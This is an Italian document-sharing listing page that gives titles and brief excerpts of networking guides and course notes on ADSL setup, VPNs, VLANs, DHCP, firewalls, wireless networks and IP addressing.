Approfondimenti dott. Stefano D. Fratepietro steve@stevelab.net C I R S F I D Università degli studi di Bologna stevelab.net Creative Commons license Stefano Fratepietro - www.stevelab.net 1 Contenuti
DettagliAttivazione della connessione PPTP ADSL
Attivazione della connessione PPTP ADSL MC-link HELP DESK ADSL Tel. 06 41892434 INSTALLAZIONE DEL MODEM ADSL Prima di tutto bisogna controllare che sia disponibile tutto quello che serve per eseguire l'installazione.
Dettagli2 Configurazione lato Router
(Virtual Private Network), è un collegamento a livello 3 (Network) stabilito ed effettuato tra due o più reti LAN attraverso una rete pubblica che non deve essere necessariamente Internet. La particolarità
DettagliMaschere di sottorete a lunghezza variabile
Sottoreti Il CIDR (Classless Inter-Domain Routing) è un nuovo schema di indirizzamento introdotto nel 1993 per sostituire lo schema classful secondo il quale tutti gli indirizzi IP appartengono ad una
DettagliInnanzitutto, esistono diversi modi per realizzare una rete o più reti messe insieme; vi illustro la mia soluzione :
SALVE, Scrivo questo breve testo di delucidazioni a seguito di alcune richieste.. e per permettere a tutti di usare al meglio zeroshell per quanto riguarda i sistemi di video sorveglianza; é mia intenzione
DettagliPrima di iniziare l installazione, controlla che tutte le parti necessarie siano presenti. La scatola dovrebbe contenere:
M A N U A L E N I - 7 0 7 5 0 2 1 C O N T E N U T O D E L L A C O N F E Z I O N E 4 C A R AT T E R I S T I C H E T E C N I C H E 4 G A M M A D I A P P L I C A Z I O N I 4 I N S TA L L A Z I O N E H A R
DettagliConfigurazione server e client DHCP in Linux
Configurazione server e client DHCP in Linux Laboratorio di Reti Ing. Telematica - Università Kore Enna A.A. 2008/2009 Ing. A. Leonardi DHCP DHCP sta per Dynamic Host Configuration Protocol e identifica
DettagliCorso avanzato di Reti e sicurezza informatica
Corso avanzato di Reti e sicurezza informatica http://www.glugto.org/ GNU/Linux User Group Torino Rilasciato sotto licenza CC-by-nc-sa. 1 DISCLAIMER L'insegnante e l'intera associazione GlugTo non si assumono
DettagliPIRELLI DISCUS DP-L10 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP
PIRELLI DISCUS DP-L10 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP Pirelli Discus DP-L10 Guida alla Configurazione EUTELIAVOIP Rev1-0 pag.2 INDICE DUAL MODE PHONE DP-L10 PIRELLI...3 Principali caratteristiche
DettagliSistema di accesso ad internet tramite la rete Wireless dell Università di Bologna
Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna Documento stampabile riassuntivo del servizio: la versione aggiornata è sempre quella pubblicata on line all indirizzo
DettagliFRITZ!WLAN Repeater 300E. Come estendere la copertura della rete Wi-Fi
Come estendere la copertura della rete Wi-Fi 1 Introduzione La crescente diffusione di dispositivi portatili per il collegamento ad Internet ha reso la connettività senza fili una caratteristica imprescindibile
DettagliVlan Relazione di Sistemi e Reti Cenni teorici
Cosa sono le Vlan? Vlan Relazione di Sistemi e Reti Cenni teorici Le Vlan sono un tipo di rete particolare che permettono di creare tante reti logiche a partire da una singola rete fisica. Questo significa
DettagliTeleassistenza Siemens
PackTeam Teleassistenza Siemens Unrestricted Siemens AG 2014 All rights reserved. Siemens.it/packteam Accesso Remoto agli Impianti Teleassistenza Possibilità di diagnosticare i guasti da remoto Possibilità
DettagliL attivazione della connessione ADSL
L attivazione della connessione ADSL MC-link HELP DESK ADSL Tel. 06 41892434 INSTALLAZIONE DEL ROUTER ADSL PER GLI UTENTI MC-link L'installazione della connessione ADSL richiede alcune operazioni molto
DettagliOnline Help StruxureWare Data Center Expert
Online Help StruxureWare Data Center Expert Version 7.2.7 StruxureWare Data Center ExpertDispositivo virtuale Il server StruxureWare Data Center Expert 7.2 è disponibile come dispositivo virtuale, supportato
DettagliSommario. Modulo 8: Applicativi. Parte 3: Terminale remoto. Premessa Telnet SSH XWindows VNC RDP. Gennaio Marzo 2007
Modulo 8: Applicativi Parte 3: Terminale remoto 1 Sommario Premessa Telnet SSH XWindows VNC RDP Reti di Calcolatori 2 1 Premessa Necessita : controllare a distanza un dispositivo attraverso la connessione
DettagliAppunti configurazione firewall con distribuzione Zeroshell (lan + dmz + internet)
Appunti configurazione firewall con distribuzione Zeroshell (lan + dmz + internet) Il sistema operativo multifunzionale creato da Fulvio Ricciardi www.zeroshell.net lan + dmz + internet ( Autore: massimo.giaimo@sibtonline.net
DettagliManuale Intel su reti Wireless
Manuale Intel su reti Wireless Una rete basata su cavi non e sempre la soluzione piu pratica, spesso una connettivita wireless risolve i problemi legati alla mobilita ed alla flessibilita che richiediamo
Dettagli1. La rete wireless per noi.
1. La rete wireless per noi. Stiamo allestendo un servizio di rete wireless esteso per quanto possibile a tutto il Dipartimento. Per cominciare le antenne sono state disposte nei luoghi in cui è più difficile
DettagliAllegato 3 Sistema per l interscambio dei dati (SID)
Sistema per l interscambio dei dati (SID) Specifiche dell infrastruttura per la trasmissione delle Comunicazioni previste dall art. 11 comma 2 del decreto legge 6 dicembre 2011 n.201 Sommario Introduzione...
DettagliTornado 830 / 831. ADSL Router - 4 port Ethernet switch - Wireless 802.11G - Access Point - Firewall - USB printer server
Tornado 830 / 831 ADSL Router - 4 port Ethernet switch - Wireless 802.11G - Access Point - Firewall - USB printer server Tornado 830 Annex A Tornado 831 Annex B 1.1 Avvio e accesso. Attivare il browser
DettagliI pacchetti: Linux. Belluno. User. Group Introduzione ai firewalls con Linux. Firestarter 1.0. Guarddog 2.3.2. Firewall Builder 2.0.
I pacchetti: Firestarter 1.0 http://www.fs-security.com/ Guarddog 2.3.2 http://www.simonzone.com/software/guarddog/ Firewall Builder 2.0.3 http://www.fwbuilder.org/ Programmi per la configurazione e la
DettagliLezione 1 Connessione ad una rete
Lezione 1 Connessione ad una rete Sistemi Operativi RedHat Enterprise Linux 4.0 Sun Solaris 10 x86 Windows 2003 Server Salvataggio/ripristino via rete con ghost4unix* uploaddisk installm@melt.sci.univr.it
DettagliOpenVPN: un po di teoria e di configurazione
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica 10 dicembre 2004 Sommario 1 Introduzione: definizione e utilizzo delle VPN 2 3 4 5 Sommario
DettagliProf. Filippo Lanubile
Firewall e IDS Firewall Sistema che costituisce l unico punto di connessione tra una rete privata e il resto di Internet Solitamente implementato in un router Implementato anche su host (firewall personale)
DettagliDal menù Network/Interface/Ethernet configurare le interfacce WAN e LAN con gli opportuni ip:
NAT 1-1 CON DOPPIA INTERFACCIA WAN E RANGE DI IP PUBBLICI (Firmware 2.20) Dal menù Network/Interface/Ethernet configurare le interfacce WAN e LAN con gli opportuni ip: L apparato per capire se la sua interfaccia
DettagliRete wireless Appunti
Rete wireless Appunti Topologia della rete La rete wireless ha la seguente topologia: Internet DHCP Radius In Internet con IP LAN 146.48.80.0 192.168.20.0 SSID isti-work SSID isti-register MAP 330 Agli
DettagliARP e instradamento IP
ARP e instradamento IP A.A. 2003/2004 Walter Cerroni Relazione Indirizzi Fisici Indirizzi IP Software di basso livello nasconde gli indirizzi fisici e consente ai livelli superiori di lavorare solo con
DettagliSicurezza e rispetto della privacy, finalmente non in conflitto.
Aylook e Privacy pag. 1 di 7 aylook, il primo sistema di videoregistrazione ibrida Privacy Compliant in grado di ottemperare alle richieste in materia di rispetto della privacy e dei diritti dei lavoratori.
DettagliSicurezza Reti. netrd. Versione: 2.1.1
Sicurezza Reti netrd Versione: 2.1.1 netrd è commercializzato da etstart srl via Austria, 23/D - 35127 Padova (PD), Italy - info@etstart.itt.it - www.etstart.it INDICE 1 Finalità documento 1.1 Destinatari
DettagliProgettare un Firewall
Progettare un Firewall Danilo Demarchi danilo@cuneo.linux.it GLUG Cuneo Corso Sicurezza 2006 Concetti introduttivi Come pensare un Firewall Argomenti trattati I Gli strumenti del Firewall Gli strumenti
DettagliCrittografia e sicurezza delle reti. Firewall
Crittografia e sicurezza delle reti Firewall Cosa è un Firewall Un punto di controllo e monitoraggio Collega reti con diversi criteri di affidabilità e delimita la rete da difendere Impone limitazioni
DettagliOffre da più di 40 anni soluzioni in settori critici come quello governativo, finanziario e della difesa.
Settembre 2015 L azienda Offre da più di 40 anni soluzioni in settori critici come quello governativo, finanziario e della difesa. Specializzata in molti ambiti tra cui quelli dei servizi di sicurezza
DettagliINDIRIZZI IP ARCHITETTURA GENERALE DEGLI INDIRIZZI IP FORME DI INDIRIZZI IP CINQUE FORME DI INDIRIZZI IP
INDIRIZZI IP ARCHITETTURA GENERALE DEGLI INDIRIZZI IP Un indirizzo IP è composto da 32 bit. Generalmente, per convenienza, è presentato in decimale: 4 ottetti (bytes) separati da un punto. Ogni rete fisica
DettagliMac Application Manager 1.3 (SOLO PER TIGER)
Mac Application Manager 1.3 (SOLO PER TIGER) MacApplicationManager ha lo scopo di raccogliere in maniera centralizzata le informazioni piu salienti dei nostri Mac in rete e di associare a ciascun Mac i
DettagliCPE Genexis Manuale d uso per utenti
Indice 1. ACCESSO ALLA CPE------------------------------------------------------------------------------ 3 2. INFO ----------------------------------------------------------------------------------------------------
DettagliEssere a casa anche in viaggio, che cos'e' e come si crea una VPN
Essere a casa anche in viaggio, che cos'e' e come si crea una VPN LinuxDay 2004@CE caserta hacklab hackaserta 81100 www.81100.eu.org relatore: Fausto Napolitano La problematica Necessità
DettagliVLAN+LDAP+...+XEN = Rete Dipartimentale
VLAN+LDAP+...+XEN = Rete Dipartimentale Uniamo varie tecnologie per creare una infrastruttura di rete,, facilmente controllabile ed estendibile. Useremo VLAN ( 802.1q), LDAP, XEN, Certificati digitali
DettagliHardware delle reti LAN
Hardware delle reti LAN Le reti LAN utilizzano una struttura basata su cavi e concentratori che permette il trasferimento di informazioni. In un ottica di questo tipo, i computer che prendono parte allo
Dettagli